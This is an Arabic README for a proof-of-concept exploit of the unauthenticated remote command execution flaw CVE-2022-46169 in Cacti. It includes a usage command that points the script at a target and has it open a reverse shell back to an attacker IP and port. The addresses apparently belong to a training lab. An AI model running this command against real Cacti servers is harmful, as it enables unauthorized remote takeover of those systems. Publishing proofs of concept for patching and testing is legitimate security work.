
تحسين PoC لتنفيذ الأوامر عن بُعد بدون مصادقة على Cacti <= 1.2.22 - CVE-2022-46169
هذا المستودع يحتوي على دليل إثبات المفهوم (PoC) لـ CVE-2022-46169 - تنفيذ برمجيات عن بعد (RCE) غير مصادق عليه في Cacti <= 1.2.22. يمكنك قراءة المزيد عن الثغرة هنا. النص البرمجي يضيف معالج شل عكسي وهو مبني على الكود الذي كتبه sAsPeCt488. يمكنك الاطلاع على الكود الأصلي هنا.
python3 CVE-2022-46169.py -t 10.129.211.250 -i 10.10.14.72 -p 4444
Arguments:
-t : Target IP address
-i : Attacker system IP Address
-p : Port for reverse shell
